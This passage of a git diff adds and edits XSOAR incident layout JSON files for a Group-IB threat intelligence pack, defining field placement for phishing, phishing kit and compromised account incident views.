"height": 22, + "id": "8ac8baf0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "8d95e4b0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "902edf10-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-b148e200-8246-11ef-a19b-c92b354e1f7d", + "items": [ + { + "endCol": 2, + "fieldId": "gibphishingdomain", + "height": 22, + "id": "b9c562e0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibphishingdomainpuny", + "height": 22, + "id": "d246ed80-8246-11ef-a19b-c92b354e1f7d", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibphishingdomainexpirationdate", + "height": 22, + "id": "d674b8b0-8246-11ef-a19b-c92b354e1f7d", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibphishingregistrar", + "height": 22, + "id": "d997a390-8246-11ef-a19b-c92b354e1f7d", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Domain Information", + "static": false, + "w": 1, + "x": 1, + "y": 4 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Attacks Phishing Group Layout", + "name": "GIB Attacks Phishing Group Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Kit_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Kit_Layout.json new file mode 100644 index 000000000000..7419b074b301 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Kit_Layout.json @@ -0,0 +1,493 @@ +{ + "description": "Layout for GIB Attacks Phishing Kit", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 12 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 10 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 10 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 53, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 53, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 53, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 53, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 53, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 12 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 4, + "hideName": false, + "i": "caseinfoid-dfe3afe0-71a8-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "dropEffect": "move", + "endCol": 6, + "fieldId": "gibid", + "height": 22, + "id": "fdac8100-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "listId": "caseinfoid-dfe3afe0-71a8-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibdatahash", + "height": 22, + "id": "03136870-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibdateofdetection", + "height": 22, + "id": "05ce1ba0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "08f26610-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibphishingkitsource", + "height": 22, + "id": "13ffaef0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 6, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "0bc498e0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "listId": "caseinfoid-dfe3afe0-71a8-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 6, + "fieldId": "gibphishingkitemail", + "height": 22, + "id": "b05b4600-861d-11ef-a12e-8b698a04d813", + "index": 6, + "listId": "caseinfoid-dfe3afe0-71a8-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibportallink", + "height": 22, + "id": "cc423f40-8492-11ef-87c7-cfae65ac92d0", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibdownloadedfromtable", + "height": 106, + "id": "feb92140-815a-11ef-84cc-d3c4e728b454", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 3, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-e0915500-71a8-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "f2123a60-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "f4dc08c0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "f7864130-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "fa52a7a0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Attacks Phishing Kit Layout", + "name": "GIB Attacks Phishing Kit Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Kit_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Kit_Layout.json index 7a360b14fe64..e854b15a415c 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Kit_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Kit_Layout.json @@ -396,7 +396,7 @@ "minH": 1, "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from GIB", "static": false, "w": 2, "x": 0, @@ -438,5 +438,7 @@ "system": false, "version": -1, "fromVersion": "6.0.0", - "marketplaces": ["xsoar"] + "marketplaces": [ + "xsoar" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Layout.json index 642e974e37e2..133974535a41 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Layout.json @@ -420,7 +420,7 @@ "minH": 1, "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from GIB", "static": false, "w": 2, "x": 0, @@ -462,5 +462,7 @@ "system": false, "version": -1, "fromVersion": "6.0.0", - "marketplaces": ["xsoar"] + "marketplaces": [ + "xsoar" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Group_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Group_Layout.json new file mode 100644 index 000000000000..ef8dfe8c29fc --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Group_Layout.json @@ -0,0 +1,1647 @@ +{ + "close": { + "sections": [ + { + "description": "", + "fields": [ + { + "fieldId": "incident_closereason", + "isVisible": true + }, + { + "fieldId": "incident_closenotes", + "isVisible": true + } + ], + "isVisible": true, + "name": "Basic Information", + "query": null, + "queryType": "", + "readOnly": false, + "type": "" + }, + { + "description": "", + "isVisible": true, + "name": "Custom Fields", + "query": null, + "queryType": "", + "readOnly": false, + "type": "" + } + ] + }, + "description": "Layout for GIB Compromised Account Group", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotsource", + "height": 22, + "id": "incident-source-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 12 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 10 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 10 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 44, + "id": "incident-closeNotes-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 12 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 4, + "hideName": false, + "i": "caseinfoid-96ff2940-71a2-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 6, + "fieldId": "gibid", + "height": 22, + "id": "3f7588d0-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibcompromisedlogin", + "height": 22, + "id": "4610aa80-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibpassword", + "height": 22, + "id": "4bfbdd20-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibparsedlogindomain", + "height": 22, + "id": "53db3ea0-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibparsedloginip", + "height": 22, + "id": "5b8dc3c0-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibservicedomain", + "height": 22, + "id": "6fc2f3b0-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibserviceip", + "height": 22, + "id": "761dd810-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibserviceurl", + "height": 22, + "id": "ab7ebf30-8236-11ef-9517-e9064fff04ea", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibportallink", + "height": 22, + "id": "ae89b540-8236-11ef-9517-e9064fff04ea", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibcompromisedeventsinformationtable", + "height": 106, + "id": "3f7f74e0-8a02-11ef-83f1-cb5094a16b27", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 3, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-987638e0-71a2-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibdatefirstcompromised", + "height": 22, + "id": "dd8d4b80-71a2-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastcompromised", + "height": 22, + "id": "e3d6cac0-71a2-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "e9f1bff0-71a2-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "f04fd8a0-71a2-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Dates", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-994d5f00-71a2-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "012ae110-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "0753b8f0-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "0d3e0130-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "164a9810-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "edit": { + "sections": [ + { + "description": "", + "fields": [ + { + "fieldId": "incident_name", + "isVisible": true + }, + { + "fieldId": "incident_occurred", + "isVisible": true + }, + { + "fieldId": "incident_reminder", + "isVisible": true + }, + { + "fieldId": "incident_owner", + "isVisible": true + }, + { + "fieldId": "incident_roles", + "isVisible": true + }, + { + "fieldId": "incident_type", + "isVisible": true + }, + { + "fieldId": "incident_severity", + "isVisible": true + }, + { + "fieldId": "incident_playbookid", + "isVisible": true + }, + { + "fieldId": "incident_labels", + "isVisible": true + }, + { + "fieldId": "incident_phase", + "isVisible": true + }, + { + "fieldId": "incident_details", + "isVisible": true + }, + { + "fieldId": "incident_attachment", + "isVisible": true + } + ], + "isVisible": true, + "name": "Basic Information", + "query": null, + "queryType": "", + "readOnly": false, + "type": "" + }, + { + "description": "", + "fields": [ + { + "fieldId": "incident_asn", + "isVisible": true + }, + { + "fieldId": "incident_asnname", + "isVisible": true + }, + { + "fieldId": "incident_accountmemberof", + "isVisible": true + }, + { + "fieldId": "incident_accountstatus", + "isVisible": true + }, + { + "fieldId": "incident_additionaldata", + "isVisible": true + }, + { + "fieldId": "incident_additionalemailaddresses", + "isVisible": true + }, + { + "fieldId": "incident_additionalindicators", + "isVisible": true + }, + { + "fieldId": "incident_affectedhosts", + "isVisible": true + }, + { + "fieldId": "incident_affectedusers", + "isVisible": true + }, + { + "fieldId": "incident_agentid", + "isVisible": true + }, + { + "fieldId": "incident_agentversion", + "isVisible": true + }, + { + "fieldId": "incident_agentsid", + "isVisible": true + }, + { + "fieldId": "incident_alertcategory", + "isVisible": true + }, + { + "fieldId": "incident_alertid", + "isVisible": true + }, + { + "fieldId": "incident_alertname", + "isVisible": true + }, + { + "fieldId": "incident_alertrules", + "isVisible": true + }, + { + "fieldId": "incident_alertsource", + "isVisible": true + }, + { + "fieldId": "incident_alerttypeid", + "isVisible": true + }, + { + "fieldId": "incident_alerttags", + "isVisible": true + }, + { + "fieldId": "incident_app", + "isVisible": true + }, + { + "fieldId": "incident_appmessage", + "isVisible": true + }, + { + "fieldId": "incident_assigneduser", + "isVisible": true + }, + { + "fieldId": "incident_assignmentgroup", + "isVisible": true + }, + { + "fieldId": "incident_attackpatterns", + "isVisible": true + }, + { + "fieldId": "incident_birthday", + "isVisible": true + }, + { + "fieldId": "incident_blockindicatorsstatus", + "isVisible": true + }, + { + "fieldId": "incident_cmd", + "isVisible": true + }, + { + "fieldId": "incident_cmdline", + "isVisible": true + }, + { + "fieldId": "incident_cveid", + "isVisible": true + }, + { + "fieldId": "incident_cvelist", + "isVisible": true + }, + { + "fieldId": "incident_cvepublished", + "isVisible": true + }, + { + "fieldId": "incident_caller", + "isVisible": true + }, + { + "fieldId": "incident_campaignname", + "isVisible": true + }, + { + "fieldId": "incident_categories", + "isVisible": true + }, + { + "fieldId": "incident_changed", + "isVisible": true + }, + { + "fieldId": "incident_childprocess", + "isVisible": true + }, + { + "fieldId": "incident_classification", + "isVisible": true + }, + { + "fieldId": "incident_cloudaccountid", + "isVisible": true + }, + { + "fieldId": "incident_cloudinstanceid", + "isVisible": true + }, + { + "fieldId": "incident_cloudoperationtype", + "isVisible": true + }, + { + "fieldId": "incident_commandline", + "isVisible": true + }, + { + "fieldId": "incident_commandlineverdict", + "isVisible": true + }, + { + "fieldId": "incident_comment", + "isVisible": true + }, + { + "fieldId": "incident_country", + "isVisible": true + }, + { + "fieldId": "incident_countrycode", + "isVisible": true + }, + { + "fieldId": "incident_countrycodenumber", + "isVisible": true + }, + { + "fieldId": "incident_customqueryresults", + "isVisible": true + }, + { + "fieldId": "incident_description", + "isVisible": true + }, + { + "fieldId": "incident_destinationhostname", + "isVisible": true + }, + { + "fieldId": "incident_destinationip", + "isVisible": true + }, + { + "fieldId": "incident_destinationnetwork", + "isVisible": true + }, + { + "fieldId": "incident_destinationnetworks", + "isVisible": true + }, + { + "fieldId": "incident_destinationport", + "isVisible": true + }, + { + "fieldId": "incident_detectedendpoints", + "isVisible": true + }, + { + "fieldId": "incident_detectedips", + "isVisible": true + }, + { + "fieldId": "incident_detecteduser", + "isVisible": true + }, + { + "fieldId": "incident_detectionurl", + "isVisible": true + }, + { + "fieldId": "incident_deviceexternalip", + "isVisible": true + }, + { + "fieldId": "incident_deviceexternalips", + "isVisible": true + }, + { + "fieldId": "incident_devicehash", + "isVisible": true + }, + { + "fieldId": "incident_deviceid", + "isVisible": true + }, + { + "fieldId": "incident_deviceinternalips", + 